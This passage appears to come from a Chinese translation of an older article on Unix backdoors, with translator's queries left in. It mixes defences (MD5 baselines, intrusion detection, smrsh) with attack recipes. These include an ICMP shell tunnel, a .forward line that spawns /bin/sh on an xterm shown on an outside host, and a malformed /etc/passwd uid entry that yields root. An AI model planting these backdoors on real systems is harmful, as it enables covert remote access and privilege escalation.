CMP Shell 后門

    Ping是通過發(fā)送和接受ICMP包檢測機器活動狀態(tài)的通用辦法之一. 許多防火墻允 許外界ping它內(nèi)部的機器. 入侵者可以放數(shù)據(jù)入Ping的ICMP包, 在ping的機器間 形成一個shell通道. 管理員也許會注意到Ping包暴風, 但除了他查看包內(nèi)數(shù)據(jù), 否者入侵者不會暴露.

    加密連接

    管理員可能建立一個sniffer試圖某個訪問的數(shù)據(jù), 但當入侵者給網(wǎng)絡(luò)通行后門加 密后,就不可能被判定兩臺機器間的傳輸內(nèi)容了.

    Windows NT

    由于Windows NT不能輕易的允許多個用戶象Unix下訪問一臺機器, 對入侵者來說 就很難闖入Windows NT,安裝后門,并從那里發(fā)起攻擊. 因此你將更頻繁地看到廣 泛的來自Unix的網(wǎng)絡(luò)攻擊. 當Windows NT提高多用戶技術(shù)后, 入侵者將更頻繁地 利用WindowsNT.如果這一天真的到來, 許多Unix的后門技術(shù)將移植到Windows N T 上, 管理員可以等候入侵者的到來. 今天, Windows NT已經(jīng)有了telnet守護程 序 . 通過網(wǎng)絡(luò)通行后門, 入侵者發(fā)現(xiàn)在Windows NT安裝它們是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此處該如何翻譯?

    :( 解決 當后門技術(shù)越先進, 管理員越難于判斷入侵者是否侵入后者他們是否被成功封殺 .

    評估

    首先要做的是積極準確的估計你的網(wǎng)絡(luò)的脆弱性, 從而判定漏洞的存在且修復之 .許多商業(yè)工具用來幫助掃描和查核網(wǎng)絡(luò)及系統(tǒng)的漏洞. 如果僅僅安裝提供商的 安 全補丁的話,許多公司將大大提高安全性.

    MD5基準線

    一個系統(tǒng)(安全)掃描的一個重要因素是MD5校驗和基準線. MD5基準線是在 入 侵前由干凈 系統(tǒng)建立. 一旦 入侵并建立了后門再建立基準線, 那么后門也 被合并進去了 .一些公司被入侵且系統(tǒng)被安置后門長達幾個月.所有的系統(tǒng)備份多 包含了后門. 當公司發(fā)現(xiàn)有 并求助備份祛除后門時, 一切努力是徒勞的, 因 為他們恢復系 統(tǒng)的同時也恢復了后門. 應該在入侵發(fā)生前作好基準線的建立.

    入侵檢測

    隨著各種組織的上網(wǎng)和允許對自己某些機器的連接,入侵檢測正變的越來越重要. 以前多數(shù)入侵檢測技術(shù)是基于日志型的. 最新的入侵檢測系統(tǒng)技術(shù)(IDS)是基于 實 時偵聽和網(wǎng)絡(luò)通行安全分析的. 最新的IDS技術(shù)可以瀏覽DNS的UDP報文, 并判 斷是 否符合DNS協(xié)議請求. 如果數(shù)據(jù)不符合協(xié)議, 就發(fā)出警告信號? 取數(shù)據(jù)進 行進一 步分析. 同樣的原則可以運用到ICMP包, 檢查數(shù)據(jù)是否符合協(xié)議要求, 或 者是否 裝載加密shell會話.

    從CD-ROM啟動

    一些管理員考慮從CD-ROM啟動從而消除了入侵者在CD-ROM上做后門的可能性.這種方法的問題是實現(xiàn)的費用和時間夠企業(yè)面臨的.

    警告 由于安全領(lǐng)域變化之快, 每天有新的漏洞被公布, 而入侵者正不斷設(shè)計新的攻擊 和安置后門技術(shù), 安枕無憂的安全技術(shù)是沒有的.請記住沒有簡單的防御,只有不 懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句該如何翻譯? :( )

    you may want to add:

    forward Backdoor

    On Unix machines, placing commands into the .forward file was also

    a common method of regaining access. For the account ``username

    a .forward file might be constructed as follows:

    \username

    |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

    permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script. from the forward file that can take arbitrary commands via stdin (after minor

    preprocessing).

    PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).

    $#@62; Using smrsh can effectively negate this backdoor (although its quite

    $#@62; possibly still a problem if you allow things like elms filter or

    $#@62; procmail which can run programs themselves...).

    你也許要增加:

    .forward后門

    Unix下在.forward文件里放入命令是重新獲得訪問的常用方法. 帳戶usernam e 的 .forward可能設(shè)置如下:

    \username

    |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

    這種方法的變形包括改變系統(tǒng)的mail的別名文件(通常位于/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現(xiàn)在標準輸入執(zhí)行任意命令(小部分預處理后). $#@62;利用smrsh可以有效的制止這種后門(雖然如果允許可以自運行的elms filter或 procmail$#@62;類程序, 很有可能還有問題

    ......)

    ( 此段的內(nèi)容理解不深, 故付上英文, 請指教! )

    你也許能用這個"特性"做后門:

    當在/etc/password里指定一個錯誤的uid/gid后, 大多數(shù)login(1)的實現(xiàn)是不能 檢查出這個錯誤 的uid/gid, 而atoi(3)將設(shè)uid/gid為0, 便給了超級用戶的權(quán) 利.

    例子:

    rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,這將把用戶 rmartin的uid設(shè)為0.